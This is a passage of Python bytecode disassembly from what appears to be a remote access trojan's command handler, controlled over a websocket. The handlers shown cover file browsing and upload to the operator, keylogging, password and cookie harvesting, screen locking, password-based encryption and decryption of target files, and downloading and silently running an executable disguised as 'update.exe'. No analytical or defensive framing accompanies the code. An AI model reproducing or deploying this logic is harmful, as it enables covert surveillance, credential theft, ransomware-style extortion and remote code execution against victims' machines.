                 STORE_FAST              17 (audio_requested)

 642             LOAD_GLOBAL             39 (_log + NULL)
                 LOAD_CONST              39 ('Cam substream -> ')
                 LOAD_GLOBAL             94 (_cam_stream_enabled)
                 FORMAT_SIMPLE
                 LOAD_CONST              40 (', audio -> ')
                 LOAD_FAST               17 (audio_requested)
                 FORMAT_SIMPLE
                 BUILD_STRING             4
                 CALL                     1
                 POP_TOP

 643             LOAD_GLOBAL             97 (_ensure_audio + NULL)
                 LOAD_FAST               17 (audio_requested)
                 CALL                     1
                 POP_TOP
        L50:     EXTENDED_ARG             6
                 JUMP_FORWARD          1698 (to L134)

 645    L51:     LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              41 ('mode')
                 LOAD_CONST              42 ('screen')
                 CALL                     2
                 STORE_GLOBAL            49 (_view_mode)

 646             LOAD_GLOBAL             93 (bool + NULL)
                 LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              38 ('audio')
                 LOAD_CONST              30 (False)
                 CALL                     2
                 CALL                     1
                 STORE_FAST              17 (audio_requested)

 647             LOAD_GLOBAL             39 (_log + NULL)
                 LOAD_CONST              43 ('View mode → ')
                 LOAD_GLOBAL             98 (_view_mode)
                 FORMAT_SIMPLE
                 LOAD_CONST              44 (', audio → ')
                 LOAD_FAST               17 (audio_requested)
                 FORMAT_SIMPLE
                 BUILD_STRING             4
                 CALL                     1
                 POP_TOP

 648             LOAD_GLOBAL             97 (_ensure_audio + NULL)
                 LOAD_FAST               17 (audio_requested)
                 CALL                     1
                 POP_TOP
        L52:     EXTENDED_ARG             6
                 JUMP_FORWARD          1619 (to L134)

 649    L53:     LOAD_FAST                7 (cmd)
                 LOAD_GLOBAL            100 (CMD_FILE_LS)
                 COMPARE_OP              88 (bool(==))
                 EXTENDED_ARG             1
                 POP_JUMP_IF_FALSE      379 (to L76)

 650             LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              45 ('path')
                 LOAD_CONST               6 ('.')
                 CALL                     2
                 STORE_FAST               9 (p)

 651             BUILD_LIST               0
                 STORE_FAST              18 (items)

 652             LOAD_FAST                9 (p)
                 LOAD_CONST              46 ('DRIVES')
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE      145 (to L63)

 653             LOAD_CONST               3 (0)
                 LOAD_CONST               0 (None)
                 IMPORT_NAME             51 (string)
                 STORE_FAST              19 (string)

 654             LOAD_FAST               19 (string)
                 LOAD_ATTR              104 (ascii_uppercase)
                 GET_ITER
        L54:     FOR_ITER                68 (to L57)
                 STORE_FAST              20 (c)

 655             LOAD_GLOBAL              8 (os)
                 LOAD_ATTR               10 (path)
                 LOAD_ATTR              107 (exists + NULL|self)
                 LOAD_FAST               20 (c)
                 FORMAT_SIMPLE
                 LOAD_CONST              47 (':\\')
                 BUILD_STRING             2
                 CALL                     1
                 TO_BOOL
        L55:     POP_JUMP_IF_TRUE         2 (to L56)
                 JUMP_BACKWARD           44 (to L54)

 656    L56:     LOAD_FAST               18 (items)
                 LOAD_ATTR              109 (append + NULL|self)
                 LOAD_FAST               20 (c)
                 FORMAT_SIMPLE
                 LOAD_CONST              47 (':\\')
                 BUILD_STRING             2
                 LOAD_CONST               1 (True)
                 LOAD_CONST               3 (0)
                 LOAD_CONST              48 (('name', 'is_dir', 'size'))
                 BUILD_CONST_KEY_MAP      3
                 CALL                     1
                 POP_TOP
                 JUMP_BACKWARD           70 (to L54)

 654    L57:     END_FOR
                 POP_TOP

 657             LOAD_DEREF              28 (ws)
                 LOAD_ATTR               69 (send + NULL|self)
                 LOAD_GLOBAL             40 (json)
                 LOAD_ATTR               70 (dumps)
                 PUSH_NULL
                 LOAD_GLOBAL            100 (CMD_FILE_LS)
                 LOAD_CONST              46 ('DRIVES')
                 LOAD_FAST               18 (items)
                 LOAD_CONST              49 (('path', 'items'))
                 BUILD_CONST_KEY_MAP      2
                 LOAD_CONST              29 (('cmd', 'data'))
                 BUILD_CONST_KEY_MAP      2
                 CALL                     1
                 CALL                     1
                 GET_AWAITABLE            0
                 LOAD_CONST               0 (None)
        L58:     SEND                     3 (to L61)
        L59:     YIELD_VALUE              1
        L60:     RESUME                   3
                 JUMP_BACKWARD_NO_INTERRUPT 5 (to L58)
        L61:     END_SEND
                 POP_TOP
        L62:     EXTENDED_ARG             5
                 JUMP_FORWARD          1437 (to L134)

 659    L63:     LOAD_GLOBAL              8 (os)
                 LOAD_ATTR              110 (scandir)
                 PUSH_NULL
                 LOAD_FAST                9 (p)
                 CALL                     1
                 GET_ITER
        L64:     FOR_ITER                96 (to L70)
                 STORE_FAST              21 (e)

 660    L65:     NOP

 661    L66:     LOAD_FAST               18 (items)
                 LOAD_ATTR              109 (append + NULL|self)
                 LOAD_FAST               21 (e)
                 LOAD_ATTR              112 (name)
                 LOAD_FAST               21 (e)
                 LOAD_ATTR              115 (is_dir + NULL|self)
                 CALL                     0
                 LOAD_FAST               21 (e)
                 LOAD_ATTR              115 (is_dir + NULL|self)
                 CALL                     0
                 TO_BOOL
                 POP_JUMP_IF_TRUE        26 (to L67)
                 LOAD_FAST               21 (e)
                 LOAD_ATTR              117 (stat + NULL|self)
                 CALL                     0
                 LOAD_ATTR              118 (st_size)
                 JUMP_FORWARD             1 (to L68)
        L67:     LOAD_CONST               3 (0)
        L68:     LOAD_CONST              48 (('name', 'is_dir', 'size'))
                 BUILD_CONST_KEY_MAP      3
                 CALL                     1
                 POP_TOP
        L69:     JUMP_BACKWARD           98 (to L64)

 659    L70:     END_FOR
                 POP_TOP

 664             LOAD_DEREF              28 (ws)
                 LOAD_ATTR               69 (send + NULL|self)
                 LOAD_GLOBAL             40 (json)
                 LOAD_ATTR               70 (dumps)
                 PUSH_NULL
                 LOAD_GLOBAL            100 (CMD_FILE_LS)
                 LOAD_GLOBAL              8 (os)
                 LOAD_ATTR               10 (path)
                 LOAD_ATTR              121 (abspath + NULL|self)
                 LOAD_FAST                9 (p)
                 CALL                     1
                 LOAD_FAST               18 (items)
                 LOAD_CONST              49 (('path', 'items'))
                 BUILD_CONST_KEY_MAP      2
                 LOAD_CONST              29 (('cmd', 'data'))
                 BUILD_CONST_KEY_MAP      2
                 CALL                     1
                 CALL                     1
                 GET_AWAITABLE            0
                 LOAD_CONST               0 (None)
        L71:     SEND                     3 (to L74)
        L72:     YIELD_VALUE              1
        L73:     RESUME                   3
                 JUMP_BACKWARD_NO_INTERRUPT 5 (to L71)
        L74:     END_SEND
                 POP_TOP
        L75:     EXTENDED_ARG             4
                 JUMP_FORWARD          1229 (to L134)

 665    L76:     LOAD_FAST                7 (cmd)
                 LOAD_GLOBAL            122 (CMD_SOUND)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE      250 (to L85)

 666             LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              50 ('name')
                 LOAD_CONST              51 ('sound.wav')
                 CALL                     2
                 STORE_FAST              22 (name)

 667             LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              52 ('bytes')
                 LOAD_CONST              20 ('')
                 CALL                     2
                 STORE_FAST              23 (b64)

 668             LOAD_FAST               23 (b64)
                 TO_BOOL
                 POP_JUMP_IF_FALSE      205 (to L84)

 669    L77:     NOP

 670    L78:     LOAD_GLOBAL            124 (base64)
                 LOAD_ATTR              126 (b64decode)
                 PUSH_NULL
                 LOAD_FAST               23 (b64)
                 CALL                     1
                 STORE_FAST               1 (audio_data)

 671             LOAD_GLOBAL              8 (os)
                 LOAD_ATTR               10 (path)
                 LOAD_ATTR               13 (join + NULL|self)
                 LOAD_GLOBAL              8 (os)
                 LOAD_ATTR               14 (environ)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST               5 ('TEMP')
                 LOAD_CONST               6 ('.')
                 CALL                     2
                 LOAD_CONST              53 ('inject_')
                 LOAD_GLOBAL             18 (uuid)
                 LOAD_ATTR               20 (uuid4)
                 PUSH_NULL
                 CALL                     0
                 LOAD_ATTR               22 (hex)
                 FORMAT_SIMPLE
                 LOAD_CONST              54 ('_')
                 LOAD_FAST               22 (name)
                 FORMAT_SIMPLE
                 BUILD_STRING             4
                 CALL                     2
                 STORE_FAST               2 (tmp)

 672             LOAD_GLOBAL             25 (open + NULL)
                 LOAD_FAST                2 (tmp)
                 LOAD_CONST               9 ('wb')
                 CALL                     2
                 BEFORE_WITH
        L79:     STORE_FAST               3 (f)

 673             LOAD_FAST                3 (f)
                 LOAD_ATTR               27 (write + NULL|self)
                 LOAD_FAST                1 (audio_data)
                 CALL                     1
                 POP_TOP

 672    L80:     LOAD_CONST               0 (None)
                 LOAD_CONST               0 (None)
                 LOAD_CONST               0 (None)
                 CALL                     2
                 POP_TOP

 674    L81:     NOP

 675    L82:     LOAD_CONST               3 (0)
                 LOAD_CONST               0 (None)
                 IMPORT_NAME             14 (winsound)
                 STORE_FAST               4 (winsound)

 676             LOAD_FAST                4 (winsound)
                 LOAD_ATTR               31 (PlaySound + NULL|self)
                 LOAD_FAST_LOAD_FAST     36 (tmp, winsound)
                 LOAD_ATTR               32 (SND_FILENAME)
                 LOAD_FAST                4 (winsound)
                 LOAD_ATTR               34 (SND_ASYNC)
                 BINARY_OP                7 (|)
                 CALL                     2
                 POP_TOP
        L83:     EXTENDED_ARG             3
                 JUMP_FORWARD           971 (to L134)

 668    L84:     EXTENDED_ARG             3
                 JUMP_FORWARD           969 (to L134)

 681    L85:     LOAD_FAST                7 (cmd)
                 LOAD_GLOBAL            128 (CMD_FILE_RUN)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE       40 (to L87)

 682             LOAD_GLOBAL              8 (os)
                 LOAD_ATTR              130 (startfile)
                 PUSH_NULL
                 LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              45 ('path')
                 LOAD_CONST               6 ('.')
                 CALL                     2
                 CALL                     1
                 POP_TOP
        L86:     EXTENDED_ARG             3
                 JUMP_FORWARD           919 (to L134)

 683    L87:     LOAD_FAST                7 (cmd)
                 LOAD_GLOBAL            132 (CMD_FILE_DL)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE      173 (to L95)

 684             LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              45 ('path')
                 LOAD_CONST              20 ('')
                 CALL                     2
                 STORE_FAST              24 (fp)

 685             LOAD_GLOBAL             25 (open + NULL)
                 LOAD_FAST               24 (fp)
                 LOAD_CONST              58 ('rb')
                 CALL                     2
                 BEFORE_WITH
        L88:     STORE_FAST               3 (f)

 686             LOAD_DEREF              28 (ws)
                 LOAD_ATTR               69 (send + NULL|self)
                 LOAD_GLOBAL             40 (json)
                 LOAD_ATTR               70 (dumps)
                 PUSH_NULL
                 LOAD_GLOBAL            132 (CMD_FILE_DL)
                 LOAD_GLOBAL              8 (os)
                 LOAD_ATTR               10 (path)
                 LOAD_ATTR              135 (basename + NULL|self)
                 LOAD_FAST               24 (fp)
                 CALL                     1
                 LOAD_GLOBAL            124 (base64)
                 LOAD_ATTR              136 (b64encode)
                 PUSH_NULL
                 LOAD_FAST                3 (f)
                 LOAD_ATTR               81 (read + NULL|self)
                 CALL                     0
                 CALL                     1
                 LOAD_ATTR              139 (decode + NULL|self)
                 CALL                     0
                 LOAD_CONST              59 (('name', 'bytes'))
                 BUILD_CONST_KEY_MAP      2
                 LOAD_CONST              29 (('cmd', 'data'))
                 BUILD_CONST_KEY_MAP      2
                 CALL                     1
                 CALL                     1
                 GET_AWAITABLE            0
                 LOAD_CONST               0 (None)
        L89:     SEND                     3 (to L92)
        L90:     YIELD_VALUE              1
        L91:     RESUME                   3
                 JUMP_BACKWARD_NO_INTERRUPT 5 (to L89)
        L92:     END_SEND
                 POP_TOP

 685    L93:     LOAD_CONST               0 (None)
                 LOAD_CONST               0 (None)
                 LOAD_CONST               0 (None)
                 CALL                     2
                 POP_TOP
        L94:     EXTENDED_ARG             2
                 JUMP_FORWARD           736 (to L134)

 687    L95:     LOAD_FAST                7 (cmd)
                 LOAD_GLOBAL            140 (CMD_KEYLOG)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE      104 (to L105)

 688             LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              60 ('action')
                 LOAD_CONST              20 ('')
                 CALL                     2
                 STORE_FAST              25 (act)

 689             LOAD_FAST               25 (act)
                 LOAD_CONST              61 ('start')
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE        4 (to L97)

 690             LOAD_CONST               1 (True)
                 STORE_GLOBAL            71 (_keylog_on)
        L96:     EXTENDED_ARG             2
                 JUMP_FORWARD           698 (to L134)

 691    L97:     LOAD_FAST               25 (act)
                 LOAD_CONST              62 ('stop')
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE        4 (to L99)

 692             LOAD_CONST              30 (False)
                 STORE_GLOBAL            71 (_keylog_on)
        L98:     EXTENDED_ARG             2
                 JUMP_FORWARD           688 (to L134)

 693    L99:     LOAD_FAST               25 (act)
                 LOAD_CONST              63 ('fetch')
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE       58 (to L104)

 694             LOAD_DEREF              28 (ws)
                 LOAD_ATTR               69 (send + NULL|self)
                 LOAD_GLOBAL             40 (json)
                 LOAD_ATTR               70 (dumps)
                 PUSH_NULL
                 LOAD_GLOBAL            140 (CMD_KEYLOG)
                 LOAD_GLOBAL            144 (_keybuf)
                 LOAD_CONST              29 (('cmd', 'data'))
                 BUILD_CONST_KEY_MAP      2
                 CALL                     1
                 CALL                     1
                 GET_AWAITABLE            0
                 LOAD_CONST               0 (None)
       L100:     SEND                     3 (to L103)
       L101:     YIELD_VALUE              1
       L102:     RESUME                   3
                 JUMP_BACKWARD_NO_INTERRUPT 5 (to L100)
       L103:     END_SEND
                 POP_TOP

 695             LOAD_CONST              20 ('')
                 STORE_GLOBAL            72 (_keybuf)

  --   L104:     EXTENDED_ARG             2
                 JUMP_FORWARD           622 (to L134)

 696   L105:     LOAD_FAST                7 (cmd)
                 LOAD_GLOBAL            146 (CMD_VAULT)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE       62 (to L111)

 697             LOAD_DEREF              28 (ws)
                 LOAD_ATTR               69 (send + NULL|self)
                 LOAD_GLOBAL             40 (json)
                 LOAD_ATTR               70 (dumps)
                 PUSH_NULL
                 LOAD_GLOBAL            146 (CMD_VAULT)
                 LOAD_GLOBAL            149 (harvest_passwords + NULL)
                 CALL                     0
                 LOAD_CONST              29 (('cmd', 'data'))
                 BUILD_CONST_KEY_MAP      2
                 CALL                     1
                 CALL                     1
                 GET_AWAITABLE            0
                 LOAD_CONST               0 (None)
       L106:     SEND                     3 (to L109)
       L107:     YIELD_VALUE              1
       L108:     RESUME                   3
                 JUMP_BACKWARD_NO_INTERRUPT 5 (to L106)
       L109:     END_SEND
                 POP_TOP
       L110:     EXTENDED_ARG             2
                 JUMP_FORWARD           550 (to L134)

 698   L111:     LOAD_FAST                7 (cmd)
                 LOAD_GLOBAL            150 (CMD_COOKIES)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE       62 (to L117)

 699             LOAD_DEREF              28 (ws)
                 LOAD_ATTR               69 (send + NULL|self)
                 LOAD_GLOBAL             40 (json)
                 LOAD_ATTR               70 (dumps)
                 PUSH_NULL
                 LOAD_GLOBAL            150 (CMD_COOKIES)
                 LOAD_GLOBAL            153 (harvest_cookies + NULL)
                 CALL                     0
                 LOAD_CONST              29 (('cmd', 'data'))
                 BUILD_CONST_KEY_MAP      2
                 CALL                     1
                 CALL                     1
                 GET_AWAITABLE            0
                 LOAD_CONST               0 (None)
       L112:     SEND                     3 (to L115)
       L113:     YIELD_VALUE              1
       L114:     RESUME                   3
                 JUMP_BACKWARD_NO_INTERRUPT 5 (to L112)
       L115:     END_SEND
                 POP_TOP
       L116:     EXTENDED_ARG             1
                 JUMP_FORWARD           478 (to L134)

 700   L117:     LOAD_FAST                7 (cmd)
                 LOAD_GLOBAL            154 (CMD_LOCK)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE       59 (to L119)

 701             LOAD_GLOBAL            156 (threading)
                 LOAD_ATTR              158 (Thread)
                 PUSH_NULL
                 LOAD_GLOBAL            160 (do_lock)
                 LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              64 ('password')
                 LOAD_CONST              65 ('admin')
                 CALL                     2
                 BUILD_TUPLE              1
                 LOAD_CONST               1 (True)
                 LOAD_CONST              66 (('target', 'args', 'daemon'))
                 CALL_KW                  3
                 LOAD_ATTR              163 (start + NULL|self)
                 CALL                     0
                 POP_TOP
       L118:     EXTENDED_ARG             1
                 JUMP_FORWARD           409 (to L134)

 702   L119:     LOAD_FAST                7 (cmd)
                 LOAD_CONST              67 (33)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE      104 (to L125)

 703             LOAD_GLOBAL            165 (do_encrypt + NULL)
                 LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              64 ('password')
                 LOAD_CONST              20 ('')
                 CALL                     2
                 LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              68 ('targets')
                 LOAD_CONST              20 ('')
                 CALL                     2
                 CALL                     2
                 STORE_FAST              20 (c)

 704             LOAD_DEREF              28 (ws)
                 LOAD_ATTR               69 (send + NULL|self)
                 LOAD_GLOBAL             40 (json)
                 LOAD_ATTR               70 (dumps)
                 PUSH_NULL
                 LOAD_GLOBAL             56 (CMD_SHELL)
                 LOAD_CONST              28 ('out')
                 LOAD_CONST              69 ('Encrypted ')
                 LOAD_FAST               20 (c)
                 FORMAT_SIMPLE
                 LOAD_CONST              70 (' files.')
                 BUILD_STRING             3
                 BUILD_MAP                1
                 LOAD_CONST              29 (('cmd', 'data'))
                 BUILD_CONST_KEY_MAP      2
                 CALL                     1
                 CALL                     1
                 GET_AWAITABLE            0
                 LOAD_CONST               0 (None)
       L120:     SEND                     3 (to L123)
       L121:     YIELD_VALUE              1
       L122:     RESUME                   3
                 JUMP_BACKWARD_NO_INTERRUPT 5 (to L120)
       L123:     END_SEND
                 POP_TOP
       L124:     EXTENDED_ARG             1
                 JUMP_FORWARD           299 (to L134)

 705   L125:     LOAD_FAST                7 (cmd)
                 LOAD_CONST              71 (34)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE      103 (to L131)

 706             LOAD_GLOBAL            167 (do_decrypt + NULL)
                 LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              64 ('password')
                 LOAD_CONST              20 ('')
                 CALL                     2
                 LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              68 ('targets')
                 LOAD_CONST              20 ('')
                 CALL                     2
                 CALL                     2
                 STORE_FAST              20 (c)

 707             LOAD_DEREF              28 (ws)
                 LOAD_ATTR               69 (send + NULL|self)
                 LOAD_GLOBAL             40 (json)
                 LOAD_ATTR               70 (dumps)
                 PUSH_NULL
                 LOAD_GLOBAL             56 (CMD_SHELL)
                 LOAD_CONST              28 ('out')
                 LOAD_CONST              72 ('Decrypted ')
                 LOAD_FAST               20 (c)
                 FORMAT_SIMPLE
                 LOAD_CONST              70 (' files.')
                 BUILD_STRING             3
                 BUILD_MAP                1
                 LOAD_CONST              29 (('cmd', 'data'))
                 BUILD_CONST_KEY_MAP      2
                 CALL                     1
                 CALL                     1
                 GET_AWAITABLE            0
                 LOAD_CONST               0 (None)
       L126:     SEND                     3 (to L129)
       L127:     YIELD_VALUE              1
       L128:     RESUME                   3
                 JUMP_BACKWARD_NO_INTERRUPT 5 (to L126)
       L129:     END_SEND
                 POP_TOP
       L130:     JUMP_FORWARD           190 (to L134)

 708   L131:     LOAD_FAST                7 (cmd)
                 LOAD_GLOBAL            168 (CMD_URL)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE       39 (to L133)

 709             LOAD_GLOBAL            170 (webbrowser)
                 LOAD_ATTR               24 (open)
                 PUSH_NULL
                 LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              73 ('url')
                 LOAD_CONST              20 ('')
                 CALL                     2
                 CALL                     1
                 POP_TOP
       L132:     JUMP_FORWARD           141 (to L134)

 710   L133:     LOAD_FAST                7 (cmd)
                 LOAD_GLOBAL            172 (CMD_DL_EXE)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE      131 (to L134)

 711             LOAD_CONST               3 (0)
                 LOAD_CONST               0 (None)
                 IMPORT_NAME             87 (urllib.request)
                 STORE_FAST              26 (urllib)

 712             LOAD_GLOBAL              8 (os)
                 LOAD_ATTR               10 (path)
                 LOAD_ATTR               13 (join + NULL|self)
                 LOAD_GLOBAL              8 (os)
                 LOAD_ATTR               14 (environ)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST               5 ('TEMP')
                 LOAD_CONST               6 ('.')
                 CALL                     2
                 LOAD_CONST              74 ('update.exe')
                 CALL                     2
                 STORE_FAST              27 (dl)

 713             LOAD_FAST               26 (urllib)
                 LOAD_ATTR              176 (request)
                 LOAD_ATTR              179 (urlretrieve + NULL|self)
                 LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              73 ('url')
                 LOAD_CONST              20 ('')
                 CALL                     2
                 LOAD_FAST               27 (dl)
                 CALL                     2
                 POP_TOP

 714             LOAD_GLOBAL             58 (subprocess)
                 LOAD_ATTR               60 (Popen)
                 PUSH_NULL
                 LOAD_FAST               27 (dl)
                 LOAD_CONST              24 (134217728)
                 LOAD_CONST              75 (('creationflags',))
                 CALL_KW                  2
                 POP_TOP

 588   L134:     EXTENDED_ARG            10
                 JUMP_BACKWARD         2627 (to L3)

 589   L135:     CLEANUP_THROW
       L136:     EXTENDED_ARG            10
                 JUMP_BACKWARD_NO_INTERRUPT 2608 (to L7)

 595   L137:     PUSH_EXC_INFO
                 WITH_EXCEPT_START
                 TO_BOOL
                 POP_JUMP_IF_TRUE         1 (to L138)
                 RERAISE                  2
       L138:     POP_TOP
       L139:     POP_EXCEPT
                 POP_TOP
                 POP_TOP
                 EXTENDED_ARG             9
                 JUMP_BACKWARD_NO_INTERRUPT 2437 (to L12)

  --   L140:     COPY                     3
                 POP_EXCEPT
                 RERAISE                  1
       L141:     PUSH_EXC_INFO

 600             LOAD_GLOBAL             36 (Exception)
                 CHECK_EXC_MATCH
                 POP_JUMP_IF_FALSE       18 (to L144)
                 POP_TOP

 601             LOAD_GLOBAL             39 (_log + NULL)
                 LOAD_CONST              10 ('Admin audio chunk saved to ')
                 LOAD_FAST                2 (tmp)
                 FORMAT_SIMPLE
                 BUILD_STRING             2
                 CALL                     1
                 POP_TOP
       L142:     POP_EXCEPT
       L143:     EXTENDED_ARG             9
                 JUMP_BACKWARD_NO_INTERRUPT 2422 (to L14)

 600   L144:     RERAISE                  0

  --   L145:     COPY                     3
                 POP_EXCEPT
                 RERAISE                  1
       L146:     PUSH_EXC_INFO

 602             LOAD_GLOBAL             36 (Exception)
                 CHECK_EXC_MATCH
                 POP_JUMP_IF_FALSE       25 (to L150)
                 STORE_FAST               5 (ex)

 603   L147:     LOAD_GLOBAL             39 (_log + NULL)
                 LOAD_CONST              11 ('Admin audio playback failed: ')
                 LOAD_FAST                5 (ex)
                 FORMAT_SIMPLE
                 BUILD_STRING             2
                 CALL                     1
                 POP_TOP
       L148:     POP_EXCEPT
                 LOAD_CONST               0 (None)
                 STORE_FAST               5 (ex)
                 DELETE_FAST              5 (ex)
                 EXTENDED_ARG             9
                 JUMP_BACKWARD_NO_INTERRUPT 2456 (to L14)

  --   L149:     LOAD_CONST               0 (None)
                 STORE_FAST               5 (ex)
                 DELETE_FAST              5 (ex)
                 RERAISE                  1

 602   L150:     RERAISE                  0

  --   L151:     COPY                     3
                 POP_EXCEPT
                 RERAISE                  1

 622   L152:     CLEANUP_THROW
       L153:     EXTENDED_ARG             8
                 JUMP_BACKWARD_NO_INTERRUPT 2104 (to L27)

 625   L154:     CLEANUP_THROW
       L155:     EXTENDED_ARG             8
                 JUMP_BACKWARD_NO_INTERRUPT 2076 (to L33)
       L156:     CLEANUP_THROW
       L157:     EXTENDED_ARG             7
                 JUMP_BACKWARD_NO_INTERRUPT 2029 (to L40)
       L158:     PUSH_EXC_INFO
                 WITH_EXCEPT_START
                 GET_AWAITABLE            2
                 LOAD_CONST               0 (None)
       L159:     SEND                     4 (to L163)
       L160:     YIELD_VALUE              1
       L161:     RESUME                   3
                 JUMP_BACKWARD_NO_INTERRUPT 5 (to L159)
       L162:     CLEANUP_THROW
       L163:     END_SEND
                 TO_BOOL
                 POP_JUMP_IF_TRUE         1 (to L164)
                 RERAISE                  2
       L164:     POP_TOP
       L165:     POP_EXCEPT
                 POP_TOP
                 POP_TOP
                 EXTENDED_ARG             8
                 JUMP_BACKWARD_NO_INTERRUPT 2051 (to L41)

  --   L166:     COPY                     3
                 POP_EXCEPT
                 RERAISE                  1

 636   L167:     CLEANUP_THROW
       L168:     EXTENDED_ARG             7
                 JUMP_BACKWARD_NO_INTERRUPT 1953 (to L47)

 657   L169:     CLEANUP_THROW
       L170:     EXTENDED_ARG             6
                 JUMP_BACKWARD_NO_INTERRUPT 1576 (to L61)

  --   L171:     PUSH_EXC_INFO

 662             POP_TOP

 663   L172:     POP_EXCEPT
                 EXTENDED_ARG             6
                 JUMP_BACKWARD         1556 (to L64)

  --   L173:     COPY                     3
                 POP_EXCEPT
                 RERAISE                  1

 664   L174:     CLEANUP_THROW
       L175:     EXTENDED_ARG             5
                 JUMP_BACKWARD_NO_INTERRUPT 1380 (to L74)

 672   L176:     PUSH_EXC_INFO
                 WITH_EXCEPT_START
                 TO_BOOL
                 POP_JUMP_IF_TRUE         1 (to L177)
                 RERAISE                  2
       L177:     POP_TOP
       L178:     POP_EXCEPT
                 POP_TOP
                 POP_TOP
                 EXTENDED_ARG             4
                 JUMP_BACKWARD_NO_INTERRUPT 1180 (to L81)

  --   L179:     COPY                     3
                 POP_EXCEPT
                 RERAISE                  1
       L180:     PUSH_EXC_INFO

 677             LOAD_GLOBAL             36 (Exception)
                 CHECK_EXC_MATCH
                 POP_JUMP_IF_FALSE       18 (to L183)
                 POP_TOP

 678             LOAD_GLOBAL             39 (_log + NULL)
                 LOAD_CONST              55 ('Injected sound saved to ')
                 LOAD_FAST                2 (tmp)
                 FORMAT_SIMPLE
                 LOAD_CONST              56 (', but winsound playback failed.')
                 BUILD_STRING             3
                 CALL                     1
                 POP_TOP
       L181:     POP_EXCEPT
       L182:     JUMP_BACKWARD_NO_INTERRUPT 192 (to L134)

 677   L183:     RERAISE                  0

  --   L184:     COPY                     3
                 POP_EXCEPT
                 RERAISE                  1
       L185:     PUSH_EXC_INFO

 679             LOAD_GLOBAL             36 (Exception)
                 CHECK_EXC_MATCH
                 POP_JUMP_IF_FALSE       24 (to L190)
                 STORE_FAST               5 (ex)

 680   L186:     LOAD_GLOBAL             39 (_log + NULL)
                 LOAD_CONST              57 ('Audio injection failed: ')
                 LOAD_FAST                5 (ex)
                 FORMAT_SIMPLE
                 BUILD_STRING             2
                 CALL                     1
                 POP_TOP
       L187:     POP_EXCEPT
                 LOAD_CONST               0 (None)
                 STORE_FAST               5 (ex)
                 DELETE_FAST              5 (ex)
       L188:     JUMP_BACKWARD_NO_INTERRUPT 225 (to L134)

  --   L189:     LOAD_CONST               0 (None)
                 STORE_FAST               5 (ex)
                 DELETE_FAST              5 (ex)
                 RERAISE                  1

 679   L190:     RERAISE                  0

  --   L191:     COPY                     3
                 POP_EXCEPT
                 RERAISE                  1

 686   L192:     CLEANUP_THROW
       L193:     EXTENDED_ARG             3
                 JUMP_BACKWARD_NO_INTERRUPT 984 (to L92)

 685   L194:     PUSH_EXC_INFO
                 WITH_EXCEPT_START
                 TO_BOOL
                 POP_JUMP_IF_TRUE         1 (to L195)
                 RERAISE                  2
       L195:     POP_TOP
       L196:     POP_EXCEPT
                 POP_TOP
                 POP_TOP
       L197:     JUMP_BACKWARD_NO_INTERRUPT 250 (to L134)

  --   L198:     COPY                     3
                 POP_EXCEPT
                 RERAISE                  1

 694   L199:     CLEANUP_THROW
       L200:     EXTENDED_ARG             3
                 JUMP_BACKWARD_NO_INTERRUPT 884 (to L103)

 697   L201:     CLEANUP_THROW
       L202:     EXTENDED_ARG             3
                 JUMP_BACKWARD_NO_INTERRUPT 813 (to L109)

 699   L203:     CLEANUP_THROW
       L204:     EXTENDED_ARG             2
                 JUMP_BACKWARD_NO_INTERRUPT 744 (to L115)

 704   L205:     CLEANUP_THROW
       L206:     EXTENDED_ARG             2
                 JUMP_BACKWARD_NO_INTERRUPT 568 (to L123)

 707   L207:     CLEANUP_THROW
       L208:     EXTENDED_ARG             1
                 JUMP_BACKWARD_NO_INTERRUPT 461 (to L129)

  --   L209:     PUSH_EXC_INFO

 715             LOAD_GLOBAL             36 (Exception)
                 CHECK_EXC_MATCH
                 POP_JUMP_IF_FALSE       46 (to L215)
                 STORE_FAST               5 (ex)

 716   L210:     LOAD_GLOBAL             39 (_log + NULL)
                 LOAD_CONST              76 ('CMD ')
                 LOAD_FAST                7 (cmd)
                 TO_BOOL
                 POP_JUMP_IF_FALSE       11 (to L211)
                 LOAD_GLOBAL             23 (hex + NULL)
